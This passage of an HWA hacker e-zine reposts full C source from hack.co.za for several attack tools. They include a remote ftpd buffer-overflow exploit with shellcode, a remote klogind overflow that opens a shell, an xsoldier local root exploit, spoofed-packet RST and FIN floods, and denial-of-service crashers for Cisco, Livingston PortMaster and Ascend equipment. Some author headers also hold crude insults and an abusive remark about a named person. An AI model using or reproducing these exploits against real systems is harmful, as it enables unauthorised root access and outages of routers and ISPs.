sockstruct.sin_family = AF_INET; iphead = (struct ip *) evilpacket; tcphead = (struct tcphdr *) (evilpacket + sizeof(struct ip)); /* Align ip and tcp headers */ iphead->ip_hl = 5; /* Ip header length is 5 */ iphead->ip_v = 4; /* ipv4 */ iphead->ip_len = sizeof(struct ip) + sizeof(struct tcphdr); /* Length of our total packet */ iphead->ip_id = htons(getpid()); /* Packet ID == PID # */ iphead->ip_ttl = 255; /* Time to live == 255 */ iphead->ip_p = IPPROTO_TCP; /* TCP Packet */ iphead->ip_sum = 0; /* No checksum */ iphead->ip_tos = 0; /* 0 Type of Service */ iphead->ip_off = 0; /* Offset is 0 */ tcphead->th_win = htons(512); /* TCP Window is 512 */ tcphead->th_flags = TH_RST; /* Reset packet */ tcphead->th_off = 0x50; /* TCP Offset 0x50 */ iphead->ip_dst.s_addr = inet_addr(argv[2]); srand(getpid()); /* Seed for rand() */ while (scur->link != NULL) { seq = rand() % time(NULL); /* Randomize our #'s */ ack = rand() % time(NULL); /* Randomize ack #'s */ sockstruct.sin_port = htons(rand() % time(NULL)); iphead->ip_src = scur->spoof; /* Set the spoofed address */ sockstruct.sin_addr = scur->spoof; for(i = sourcefrom; i <= sourceto; i++) { for(int2 = destfrom; int2 <= destto; int2++) { usleep(2); /* Sleep 5ms between packets */ seq += (rand() %10)+250; ack += (rand() %10)+250; tcphead->th_seq = htonl(seq); /* Set sequence number */ tcphead->th_ack = htonl(ack); /* Set ack number */ tcphead->th_dport = htons(int2); /* Set destination port */ tcphead->th_sport = htons(i); /* Set source port */ snprintf(src, 20, "%s", inet_ntoa(iphead->ip_src)); snprintf(dst, 20, "%s", inet_ntoa(iphead->ip_dst)); /* Copy info to src and dst for printing */ printf("TCP RESET: [%s:%d] -> [%s:%d]\n", src, ntohs(tcphead->th_sport), dst, ntohs(tcphead->th_dport)); sendto(sock, &evilpacket, sizeof(evilpacket), 0x0, (struct sockaddr *) & sockstruct, sizeof(sockstruct)); /* Send our evil packet */ }; }; scur = scur->link; /* Cycle the spoof ips */ } scur = sfirst; return (1); }; /* www.hack.co.za [20 May]*/ @HWA 248.0 [IND] ftpexp.c (Version 6.2/Linux-0.10) ftpd overflow by digit. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ teddi@linux.is /* * FTP server (Version 6.2/OpenBSD/Linux-0.10) and 6.3 ?? * getwd() overflow. linux exploit, remote penetration. * * author: DiGiT - teddi@linux.is * * greets: p0rtal && \x90 & me for discovering this bug. * big thx to duke for ADMwuftp. * #hax, #!ADM * Run like: (./ftpexp 0 dir ; cat) | nc victim.com 21 * offset vary from -500 - +500 * PRIVATE EXPLOIT$#%#%#$ */ #include #include // need to find for other, tested of slack 3.6. // #define RET 0xbfffec5c #define RET 0xbfffeb30 #define USERNAME "ftp" #define PASSWORD "lamer@" char shellcode[] = "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" "\x90\x90\x31\xc0\x31\xdb\xb0\x17" "\xcd\x80\x31\xc0\xb0\x17\xcd\x80" "\x31\xc0\x31\xdb\xb0\x2e\xcd\x80" "\xeb\x4f\x31\xc0\x31\xc9\x5e\xb0" "\x27\x8d\x5e\x05\xfe\xc5\xb1\xed" "\xcd\x80\x31\xc0\x8d\x5e\x05\xb0" "\x3d\xcd\x80\x31\xc0\xbb\xd2\xd1" "\xd0\xff\xf7\xdb\x31\xc9\xb1\x10" "\x56\x01\xce\x89\x1e\x83\xc6\x03" "\xe0\xf9\x5e\xb0\x3d\x8d\x5e\x10" "\xcd\x80\x31\xc0\x88\x46\x07\x89" "\x76\x08\x89\x46\x0c\xb0\x0b\x89" "\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd" "\x80\xe8\xac\xff\xff\xff"; void mkd(char *dir) { char blah[1024], *p; int n; bzero(blah, sizeof(blah)); p = blah; for(n=0; n 1) offset = atoi(argv[1]); else offset = 0; fprintf(stderr, "ret-addr = 0x%x\n", RET + offset); fprintf(stderr, "shell size = %d\n", sizeof(shellcode)); dir2[231] = '\0'; memset(dir2, '\x90', 230); printf("user %s\r\n", USERNAME); printf("pass %s\r\n", PASSWORD); printf("cwd %s\r\n", argv[2]); memset(buf1, 0x90, 600); p = &buf1[sizeof(argv[2])]; q = &buf1[599]; *q = '\x00'; while(p <= q) { strncpy(tmp, p, 100); mkd(tmp); p+=100; } mkd(dir2); mkd(shellcode); mkd("bin"); mkd("sh"); memset(buf2, 0x90, 100); // var 96 for(i=4; i<96; i+=4) *(long *)&buf2[i] = RET + offset; p = &buf2[0]; q = &buf2[99]; strncpy(tmp, p, 100); mkd(tmp); printf("pwd\r\n"); } /* www.hack.co.za [20 May]*/ @HWA 249.0 [IND] killsentry.c linux/misc remote port sentry killer by vortexia. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ andrew@cnsec.co.za /* killsentry.c (c) 1999 Vortexia / Andrew Alston Excuse the crappy coding, this code was written when I was very bored, had nothing better to do, and felt like proving the point that automatic firewalling is a bad idea. The code spoofs FIN packets from sequential internet hosts, starting at 1.0.0.0 and going right through to 255.255.255.255, sending 15 packets from each, one packet each to port 100 to 115. Feel free to modify this code, if you use the code for anything, please give me credit where it is due. I hold no responsibility for anything this code is used for, I give no guarantees that this code works, and I hold no responsibility for anything this code does to any system you run it on. If you screw up with it, its your problem, not mine. The code compiles 100% fine with no warnings on FreeBSD 3.2, I dont know about any other platforms or systems. Greets and shoutouts: Wyze1 - Thanks for the moral support, here is something you may use in Forbidden Knowledge Sniper - My partner in crime, you rock Timewiz - What can I say, thanks for ideas for projects still coming Moe1 - For all the information Ive had from you - Its appreciated Uglykidjoe - For things said and done - I owe you Hotmetal - A general greet Bretton Vine - Dont worry the underground you hate so much still loves you Everyone else in #hack on irc.electrocity.com - You guys rock Curses, fuckoffs, and the like - Logik - Get a clue, skript kiddie life aint the way Gaspode - I dont think I even need this - a major FUCK YOU and I hope you get castrated with a rusty spoon - take your god like attitude and shove it up your ass Sunflower - May you fall pregnant to one of the many ircops you screw Anyone else that I dislike but cant think of right now - FUCK YOU Anyone who dislikes me - FUCK YOU */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define TARGETHOST "YOURTARGETHERE" int main() { int octet1, octet2, octet3, octet4; int i; int sock; int on = 1; struct sockaddr_in sockstruct; struct ip *iphead; struct tcphdr *tcphead; char ipkill[20]; char evilpacket[sizeof(struct ip) + sizeof(struct tcphdr)]; struct in_addr spoof, target; int seq, ack; bzero(&evilpacket, sizeof(evilpacket)); // Very bad way to generate sequence numbers srand(getpid()); seq = rand()%time(NULL); ack = rand()%time(NULL); target.s_addr=inet_addr(TARGETHOST); if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("socket"); exit(-1); } if(setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)) < 0) { perror("setsockopt"); exit(-1); } sockstruct.sin_family = AF_INET; iphead = (struct ip *)evilpacket; tcphead = (struct tcphdr *)(evilpacket + sizeof(struct ip)); iphead->ip_hl = 5; iphead->ip_v = 4; iphead->ip_len = sizeof(struct ip) + sizeof(struct tcphdr); iphead->ip_id = htons(getpid()); iphead->ip_ttl = 255; iphead->ip_p = IPPROTO_TCP; iphead->ip_dst = target; iphead->ip_sum = 0; iphead->ip_tos = 0; iphead->ip_off = 0; tcphead->th_sport = htons(80); tcphead->th_seq = htonl(seq); tcphead->th_ack = htonl(ack); tcphead->th_win = htons(512); tcphead->th_flags = TH_FIN; tcphead->th_off = 0x50; for(octet1 = 1; octet1 <= 255; octet1++) for(octet2 = 0; octet2 <= 255; octet2++) for(octet3 = 0; octet3 <= 255; octet3++) for(octet4 = 0; octet4 <= 255; octet4++) { bzero(ipkill, 20); sprintf(ipkill, "%d.%d.%d.%d", octet1, octet2, octet3, octet4); for(i = 100; i <= 115; i++) { tcphead->th_dport = htons(i); sockstruct.sin_port = htons(i); spoof.s_addr = inet_addr(ipkill); iphead->ip_src = spoof; sockstruct.sin_addr = spoof; sendto(sock,&evilpacket,sizeof(evilpacket),0x0,(struct sockaddr *)&sockstruct, sizeof(sockstruct)); } } return(1); }; /* www.hack.co.za [20 May]*/ @HWA 249.0 [IND] cisconuke.c cisco http mass dos tool. ;)) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.hack.co.za/os/routers/cisco/cisconuke.c NOTE: Distributed by hack.co.za don't complain to me! - Ed /* - PRIVATE Do NOT distribute PRIVATE - Cisco IOS deficiency (web-server interface) allows an arbitrary router to be rebooted. 1. Create an IP address list (or hostnames). 2. gcc -o cisconuke cisconuke.c 3. ./cisconuke ip-address-list 4. If the target's a Cisco with open TCP/80, it goez b00m. We use a timeout because, in the event that a host resolves but is down, waiting for ETIMEDOUT would slow your DOSing down. Adjust if necessary (slow links etc). Comment out the VERBOSE #define if you don't want to see what's happening. */ #define VERBOSE #define TIMEOUT 10 #include #include #include #include #include #include #include #include #include #include #include #include sigjmp_buf env; u_long resolve_host(u_char *host) { struct in_addr addr; struct hostent *host_ent; if ((addr.s_addr = inet_addr(host)) == -1) { host_ent = gethostbyname(host); if (!host_ent) return((u_long)0); memcpy((char *)&addr.s_addr, host_ent->h_addr, host_ent->h_length); } return(addr.s_addr); } void net_timeout(void) { alarm(0); siglongjmp(env, 1); } int nuke_cisco(u_long dst_ip) { struct sockaddr_in sin; u_char crash[] = "GET /\%\%\n\n"; int sock; alarm (0); sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (sock == -1) { perror("socket allocation"); exit(-1); } sin.sin_family = AF_INET; sin.sin_port = htons(80); sin.sin_addr.s_addr = dst_ip; if (sigsetjmp(env, 1)) { /* Timeout. */ close(sock); return(-1); } alarm(TIMEOUT); signal(SIGALRM, (void *)net_timeout); if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) == -1) { close(sock); return(-1); } alarm (0); if (write(sock, crash, strlen(crash)) != strlen(crash)) { close(sock); fprintf(stderr, "\nWarning: truncated write()\n"); return(-1); } close(sock); return(0); } int main(int argc, char **argv) { FILE *filez; struct in_addr addr; u_long dst_ip = 0; u_char host[255] = {0}; int nuked = 0, notnuked = 0; if (argc != 2) { fprintf(stderr, "\nusage:\t%s ip_list\n\n", argv[0]); exit(-1); } filez = fopen(argv[1], "r"); if (!filez) { fprintf(stderr, "Can't open IP address list file.\n"); exit(-1); } while (fgets(host, sizeof(host) - 1, filez) > 0) { host[strlen(host) - 1] = 0; host[strlen(host) ] = 0; dst_ip = resolve_host(host); if (dst_ip) { #ifdef VERBOSE addr.s_addr = dst_ip; fprintf(stderr, "Resolved host `%s`, killing.. ", inet_ntoa(addr)); #endif /* VERBOSE */ if (!nuke_cisco(dst_ip)) { #ifdef VERBOSE fprintf(stderr, "success.\n"); nuked++; #endif /* VERBOSE */ } else { #ifdef VERBOSE fprintf(stderr, "can't connect to TCP/80\n"); notnuked++; #endif /* VERBOSE */ } } else { #ifdef VERBOSE fprintf(stderr, "Can't resolve %s\n", host); notnuked++; #endif /* VERBOSE */ } memset(host, 0, sizeof(host)); } fprintf(stderr, "\nCompleted run:\n" "Obtained a successful connection and sent crash: %d hosts.\n" "No connection to port 80 or cannot resolve: %d hosts.\n\n", nuked, notnuked); exit(0); } /* EOF */ /* www.hack.co.za [19 May]*/ @HWA 250.0 [IND] xsol-x.c mandrake 7.0 local overflow by lwc. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ lwc@vapid.dhs.org /*Larry W. Cashdollar linux xsolider exploit. *lwc@vapid.dhs.org http://vapid.dhs.org *if xsolider is built and installed from its source it will be installed *setuid root in /usr/local/games *original exploit found by brock tellier for freebsd 3.3 ports packages. *If a setregid() call is placed in the shellcode, you can get egid=12 *with the default mandrake installation.*/ #include #include #define NOP 0x90 /*no operation skip to next instruction. */ #define LEN 4480 /*our buffersize. */ char shellcode[] = /*execve with setreuid(0,0) and no '/' hellkit v1.1 */ "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x6c\x80\x36\x01\x46\xe2\xfa" "\xea\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01" "\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xc7\x11" "\x01\x01\x8c\xba\x1f\xee\xfe\xfe\xc6\x44\xfd\x01\x01\x01\x01\x88\x7c\xf9\xb9" "\x47\x01\x01\x01\x30\xf7\x30\xc8\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a\x01" "\x01\x01\x88\xff\x30\xd3\x52\x88\xf2\xcc\x81\x30\xc1\x5a\x5f\x5e\x88\xed\x5c" "\xc2\x91"; /*Nab the stack pointer to use as an index into our nop's*/ long get_sp () { __asm__ ("mov %esp, %eax"); } int main (int argc, char *argv[]) { char buffer[LEN]; int i, offset; long retaddr = get_sp (); if (argc <= 1) offset = 0; else offset = atoi (argv[1]); /*#Copy the NOPs in to the buffer leaving space for shellcode and #pointers*/ for (i = 0; i < (LEN - strlen (shellcode) - 100); i++) *(buffer + i) = NOP; /*[NNNNNNNNNNNNNNNNNNNNN ]*/ /* ^-- LEN -(strlen(shellcode)) - 35*/ /*#Copy the shell code into the buffer*/ memcpy (buffer + i, shellcode, strlen (shellcode)); /*[NNNNNNNNNNNNNNNNNNNNNSSSSSSSSSSSSSSSS ]*/ /* ^-(buffer+i) */ /*#Fill the buffer with our new address to jump to esp + offset */ for (i = i + strlen (shellcode); i < LEN; i += 4) *(long *) &buffer[i] = retaddr+offset; /*[NNNNNNNNNNNNNNNNNNNNNSSSSSSSSSSSSSSSSRRRRRRRRRRRRR]*/ /* ^-(i+strlen(shellcode))*/ printf ("Jumping to address %x BufSize %d\n", retaddr + offset, LEN); execl ("/usr/local/games/xsoldier", "xsoldier", "-display", buffer, 0); } /* www.hack.co.za [19 May]*/ @HWA 251.0 [IND] klogind.c bsdi 4.0.1 remote overflow by duke. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ duke@viper.net.au /* klogin remote buffer overflow by duke (duke@viper.net.au) tested on BSDI 4.0.1 klogin. The bug is actually in the kerberos library so this affects all kerb services (kerbIV). This code should need minimal (if any) modification to use on other kerberos services. it will only work if the file /etc/kerberosIV/krb.conf exists. -duke */ #include #include #include #include #include #include #include #include #include #define RET 0x8047830 #define NOPLEN 900 #define MAX(x, y) ((x > y) ? x : y) char bsdi_shell[]= "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c\x89\x76" "\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff\xff\xff\xff\x07" "\xff\xe8\xdc\xff\xff\xff/bin/sh\x00"; void usage(char *); void shell(int); char *make_data(void); int offset=0; int main(int argc, char **argv) { int sockfd, port=543, c; char *pkt, buf[1024]; struct sockaddr_in sin; struct hostent *hp; while((c = getopt(argc, argv, "p:o:")) != EOF){ switch(c){ case 'p': port = atoi(optarg); break; case 'o': offset = atoi(optarg); break; default: usage(argv[0]); } } if(!argv[optind]) usage(argv[0]); if((hp = gethostbyname(argv[optind])) == NULL){ fprintf(stderr, "can't resolve host\n"); exit(-1); } pkt = make_data(); bzero(&sin, sizeof(sin)); sin.sin_family = AF_INET; sin.sin_port = htons(port); sin.sin_addr = *((struct in_addr *)hp->h_addr_list[0]); if((sockfd=socket(AF_INET, SOCK_STREAM, 0)) < 0){ perror("socket"); exit(-1); } if(connect(sockfd, (struct sockaddr *)&sin, sizeof(sin)) < 0){ perror("connect"); exit(-1); } write(sockfd, pkt, 1221); free(pkt); shell(sockfd); } void usage(char *p) { fprintf(stderr, "usage: %s [ -p port ] [ -o offset ] \n", p); fprintf(stderr, "-p: port to use\n"); fprintf(stderr, "-o: offset\n"); exit(0); } char *make_data(void) { char *tmp, *ptr; int i; if((tmp=(char *)calloc(1250, sizeof(char))) == NULL){ perror("calloc"); exit(-1); } ptr = tmp; *ptr++ = 0x00; memcpy(ptr, "AUTHV0.1", 8); ptr+=8; for(i=0; i<8; i++) *ptr++ = 0x41; *(unsigned long *)ptr = htonl(1200); ptr+=4; *(unsigned int *)ptr++ = 4; *ptr++ = 8; *ptr++ = 1; for(i=0; i < 600; i+=4) *(long *)&ptr[i] = RET + offset; memset(ptr+300, 0x90, NOPLEN); memcpy(ptr+800, bsdi_shell, sizeof(bsdi_shell)); *(ptr+1000) = 0x00; return(tmp); } void shell(int sock) { fd_set rset; char bu[1024]; write(sock, "cd /; id; pwd; uname -a;\n", 25); FD_ZERO(&rset); for(;;){ FD_SET(fileno(stdin), &rset); FD_SET(sock, &rset); if(select(MAX(sock, fileno(stdin))+1, &rset, NULL, NULL, NULL) < 0){ perror("select"); exit(-1); } if(FD_ISSET(sock, &rset)){ char buf[1024]; int n; bzero(buf, sizeof(buf)); n = read(sock, buf, sizeof(buf)-1); if(n == 0){ printf("EOF from server\n"); exit(0); } if(n < 0){ perror("read"); exit(-1); } else { write(1, buf, n); } } if(FD_ISSET(fileno(stdin), &rset)){ char buf[1024]; bzero(buf, sizeof(buf)); if(fgets(buf, sizeof(buf)-4, stdin) == NULL){ printf("OK. Quitting\n"); close(sock); exit(0); } strcat(buf, "\n"); if(write(sock, buf, strlen(buf)) < 0){ perror("write"); exit(0); } } } } /* www.hack.co.za [19 May]*/ @HWA 252.0 [IND] pmcrash.c router/livingston remote dos attack. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* The following code will crash ANY Livingston PortMaster. It telnets the the portmaster and overflows its buffers. Thanks to 'The Doc' for this one. */ /* pmcrash - note this'll work much faster if all your arguments are IP addresses.. mainly because I didn't feel like coding a structure to keep track of all the resolved names.. so write a script to resolve your list of names first, then provide those as arguments */ /* This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. */ /* Compiling instructions: Linux: gcc -O2 -fomit-frame-pounter -s -o pmfinger pmfinger.c Solaris 2.4: cc -O -s -o pmfinger pmfinger.c -lsocket -lnsl -lresolv -lucb */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifndef sys_errlist extern char *sys_errlist[]; #endif #ifndef errno extern int errno; #endif /* Inet sockets :-) */ int num=0; int socks[250]; /* show sessions flag */ unsigned short int showflag=0; char * mystrerror(int err) { return(sys_errlist[err]); } void exitprog(void) { while(num--) { shutdown(socks[num-1],0); close(socks[num-1]); } exit(0); } unsigned long int resolver(host) char *host; { unsigned long int ip=0L; if(host && *host && (ip=inet_addr(host))==-1) { struct hostent *he; if(!(he=gethostbyname((char *)host))) ip=0L; else ip=*(unsigned long *)he->h_addr_list[0]; } return(ip); } void usage(void) { puts("pmcrash v0.2a - ComOS System Rebooter :-)\n" "Copyright (C) 1995 LAME Communications\n" "Written by Dr. Delete, Ph.D.\n\n" "Usage: pmcrash [:port] [[:port] ... ]\n"); exit(0); } void main(int argc,char *argv[]) { unsigned short int port=0,x=1; struct sockaddr_in server; char crash[] = { 0xFF,0xF3,0xFF,0xF3,0xFF,0xF3,0xFF,0xF3,0xFF,0xF3 }; char *temp; if(argc<2) usage(); signal(SIGPIPE,(void (*)())exitprog); signal(SIGHUP,(void (*)())exitprog); signal(SIGINT,(void (*)())exitprog); signal(SIGTERM,(void (*)())exitprog); signal(SIGBUS,(void (*)())exitprog); signal(SIGABRT,(void (*)())exitprog); signal(SIGSEGV,(void (*)())exitprog); server.sin_family=AF_INET; printf("\nConnecting..."); fflush(stdout); for(;x #include #include #include #include #include #include #include #include #include #include #include #include #include #include int net_connect (struct sockaddr_in *cs, char *server, unsigned short int port, char *sourceip, unsigned short int sourceport, int sec); void net_write (int fd, const char *str, ...); unsigned long int net_resolve (char *host); void usage (void) { printf ("usage: ./cisco host times\n"); exit (EXIT_FAILURE); } int main (int argc, char *argv[]) { char host[256]; int port,times,count,sd = 0; int m = 0; struct sockaddr_in cs; printf ("Cisco 760 series Connection Overflow.\n"); printf ("-------------------------------------\n"); if (argc < 3) usage(); strcpy (host, argv[1]); times=atoi (argv[2]); if ((times < 1) || (times > 10000)) /*Maximum number of connections*/ usage(); port =23; /* This might be changed to the telnet port of the router*/ printf ("Host: %s Times: %d\n", host, times); for (count=0;countsin_family = AF_INET; cs->sin_port = htons (port); fd = socket (cs->sin_family, SOCK_STREAM, 0); if (fd == -1) return (-1); if (!(cs->sin_addr.s_addr = net_resolve (server))) { close (fd); return (-1); } flags = fcntl (fd, F_GETFL, 0); if (flags == -1) { close (fd); return (-1); } n = fcntl (fd, F_SETFL, flags | O_NONBLOCK); if (n == -1) { close (fd); return (-1); } error = 0; n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in)); if (n < 0) { if (errno != EINPROGRESS) { close (fd); return (-1); } } if (n == 0) goto done; FD_ZERO(&rset); FD_ZERO(&wset); FD_SET(fd, &rset); FD_SET(fd, &wset); tv.tv_sec = sec; tv.tv_usec = 0; n = select(fd + 1, &rset, &wset, NULL, &tv); if (n == 0) { close(fd); errno = ETIMEDOUT; return (-1); } if (n == -1) return (-1); if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) { if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) { len = sizeof(error); if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) { errno = ETIMEDOUT; return (-1); } if (error == 0) { goto done; } else { errno = error; return (-1); } } } else return (-1); done: n = fcntl(fd, F_SETFL, flags); if (n == -1) return (-1); return (fd); } unsigned long int net_resolve (char *host) { long i; struct hostent *he; i = inet_addr(host); if (i == -1) { he = gethostbyname(host); if (he == NULL) { return (0); } else { return (*(unsigned long *) he->h_addr); } } return (i); } void net_write (int fd, const char *str, ...) { char tmp[8192]; va_list vl; int i; va_start(vl, str); memset(tmp, 0, sizeof(tmp)); i = vsnprintf(tmp, sizeof(tmp), str, vl); va_end(vl); send(fd, tmp, i, 0); return; } /* www.hack.co.za [19 May]*/ @HWA 254.0 [IND] ascend.c ascend remote dos attack by the posse. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* The Posse Brings you: The Linux Ascend Kill Program! Kill your local ISP (or even non-local) 313373133731337313373133731337313373133731337313373133731337313373133731337 1 3 3 1 3 Because Ascend has such a strong programming department that would 3 7 never under any circumstances release a version of their code which 3 3 contained a bug. 7 1 3 3 Well. Ascend did it again. Those pesky non zero length tcp offset's 1 3 do it everytime! Are those fault lights available in christmas colors 3 7 in time for the season? h0h0h0.. 3 3 7 1 BTW, if anyone has any pictures of MSN pops, please post them to 3 3 someplace public so we can all share in the season spirit. 1 3 3 7 - The Posse is back! 3 3 7 1 greetz to : alpha bits, the grave digger, and fast freddy. 3 3 1 3 Goto our eleet ftp sitez: 3 7 3 3 7 1 The Dark Dungeon 198.34.1xx.xxx 600 gigz online! 3 3 Strobe Room 34.101.1xx.xxx 1TB of Warez and H/P/V/A/C/K text 1 3 3 731337313373133731337313373133731337313373133731337313373133731337313373133 3 7 1 2600.com is run off vnetmax.villagenet.com (205.136.35.3) 3 3 Keep your support of 2600, help Emmanuel play with his little boys 1 3 3 731337313373133731337313373133731337313373133731337313373133731337313373133 3 */ #include #include #include #include #include #include #include #include #include #include #include #include unsigned short compute_tcp_checksum(struct tcphdr *th, int len, unsigned long saddr, unsigned long daddr) { unsigned long sum; __asm__(" addl %%ecx, %%ebx adcl %%edx, %%ebx adcl $0, %%ebx " : "=b"(sum) : "0"(daddr), "c"(saddr), "d"((ntohs(len) << 16) + IPPROTO_TCP*256) : "bx", "cx", "dx" ); __asm__(" movl %%ecx, %%edx cld cmpl $32, %%ecx jb 2f shrl $5, %%ecx clc 1: lodsl adcl %%eax, %%ebx lodsl adcl %%eax, %%ebx lodsl adcl %%eax, %%ebx lodsl adcl %%eax, %%ebx lodsl adcl %%eax, %%ebx lodsl adcl %%eax, %%ebx lodsl adcl %%eax, %%ebx lodsl adcl %%eax, %%ebx loop 1b adcl $0, %%ebx movl %%edx, %%ecx 2: andl $28, %%ecx je 4f shrl $2, %%ecx clc 3: lodsl adcl %%eax, %%ebx loop 3b adcl $0, %%ebx 4: movl $0, %%eax testw $2, %%dx je 5f lodsw addl %%eax, %%ebx adcl $0, %%ebx movw $0, %%ax 5: test $1, %%edx je 6f lodsb addl %%eax, %%ebx adcl $0, %%ebx 6: movl %%ebx, %%eax shrl $16, %%eax addw %%ax, %%bx adcw $0, %%bx " : "=b"(sum) : "0"(sum), "c"(len), "S"(th) : "ax", "bx", "cx", "dx", "si" ); return((~sum) & 0xffff); } #define psize ( sizeof(struct iphdr) + sizeof(struct tcphdr) ) #define tcp_offset ( sizeof(struct iphdr) ) #define err(x) { fprintf(stderr, x); exit(1); } #define errors(x, y) { fprintf(stderr, x, y); exit(1); } struct iphdr temp_ip; int temp_socket = 0; u_short ip_checksum (u_short * buf, int nwords) { unsigned long sum; for (sum = 0; nwords > 0; nwords--) sum += *buf++; sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); return ~sum; } void fixhost (struct sockaddr_in *addr, char *hostname) { struct sockaddr_in *address; struct hostent *host; address = (struct sockaddr_in *) addr; (void) bzero ((char *) address, sizeof (struct sockaddr_in)); address->sin_family = AF_INET; address->sin_addr.s_addr = inet_addr (hostname); if ((int) address->sin_addr.s_addr == -1) { host = gethostbyname (hostname); if (host) { bcopy (host->h_addr, (char *) &address->sin_addr, host->h_length); } else { puts ("Couldn't resolve address!!!"); exit (-1); } } } unsigned int lookup (host) char *host; { unsigned int addr; struct hostent *he; addr = inet_addr (host); if (addr == -1) { he = gethostbyname (host); if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL)) return 0; bcopy (*(he->h_addr_list), &(addr), sizeof (he->h_addr_list)); } return (addr); } unsigned short lookup_port (p) char *p; { int i; struct servent *s; if ((i = atoi (p)) == 0) { if ((s = getservbyname (p, "tcp")) == NULL) errors ("Unknown port %s\n", p); i = ntohs (s->s_port); } return ((unsigned short) i); } void spoof_packet (struct sockaddr_in local, int fromport, \ struct sockaddr_in remote, int toport, ulong sequence, \ int sock, u_char theflag, ulong acknum, \ char *packdata, int datalen) { char *packet; int tempint; if (datalen > 0) datalen++; packet = (char *) malloc (psize + datalen); tempint = toport; toport = fromport; fromport = tempint; { struct tcphdr *fake_tcp; fake_tcp = (struct tcphdr *) (packet + tcp_offset); fake_tcp->th_dport = htons (fromport); fake_tcp->th_sport = htons (toport); fake_tcp->th_flags = theflag; fake_tcp->th_seq = random (); fake_tcp->th_ack = random (); /* this is what really matters, however we randomize everything else to prevent simple rule based filters */ fake_tcp->th_off = random (); fake_tcp->th_win = random (); fake_tcp->th_urp = random (); } if (datalen > 0) { char *tempbuf; tempbuf = (char *) (packet + tcp_offset + sizeof (struct tcphdr)); for (tempint = 0; tempint < datalen - 1; tempint++) { *tempbuf = *packdata; *tempbuf++; *packdata++; } *tempbuf = '\r'; } { struct iphdr *real_ip; real_ip = (struct iphdr *) packet; real_ip->version = 4; real_ip->ihl = 5; real_ip->tot_len = htons (psize + datalen); real_ip->tos = 0; real_ip->ttl = 64; real_ip->protocol = 6; real_ip->check = 0; real_ip->id = 10786; real_ip->frag_off = 0; bcopy ((char *) &local.sin_addr, &real_ip->daddr, sizeof (real_ip->daddr)); bcopy ((char *) &remote.sin_addr, &real_ip->saddr, sizeof (real_ip->saddr)); temp_ip.saddr = htonl (ntohl (real_ip->daddr)); real_ip->daddr = htonl (ntohl (real_ip->saddr)); real_ip->saddr = temp_ip.saddr; real_ip->check = ip_checksum ((u_short *) packet, sizeof (struct iphdr) >> 1); { struct tcphdr *another_tcp; another_tcp = (struct tcphdr *) (packet + tcp_offset); another_tcp->th_sum = 0; another_tcp->th_sum = compute_tcp_checksum (another_tcp, sizeof (struct tcphdr) + datalen, real_ip->saddr, real_ip->daddr); } } { int result; sock = (int) temp_socket; result = sendto (sock, packet, psize + datalen, 0, (struct sockaddr *) &remote, sizeof (remote)); } free (packet); } void main (argc, argv) int argc; char **argv; { unsigned int daddr; unsigned short dport; struct sockaddr_in sin; int s, i; struct sockaddr_in local, remote; u_long start_seq = 4935835 + getpid (); if (argc != 3) errors ("Usage: %s \n\nDest port of 23 for Ascend units.\n", argv[0]); if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) err ("Unable to open raw socket.\n"); if ((temp_socket = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) err ("Unable to open raw socket.\n"); if (!(daddr = lookup (argv[1]))) err ("Unable to lookup destination address.\n"); dport = lookup_port (argv[2]); sin.sin_family = AF_INET; sin.sin_addr.s_addr = daddr; sin.sin_port = dport; fixhost ((struct sockaddr_in *)(struct sockaddr *) &local, argv[1]); fixhost ((struct sockaddr_in *)(struct sockaddr *) &remote, argv[1]); /* 500 seems to be enough to kill it */ for (i = 0; i < 500; i++) { start_seq++; local.sin_addr.s_addr = random (); spoof_packet (local, random (), remote, dport, start_seq, (int) s, TH_SYN | TH_RST | TH_ACK, 0, NULL, 0); } } /* www.hack.co.za [19 May]*/ @HWA 255.0 [IND] 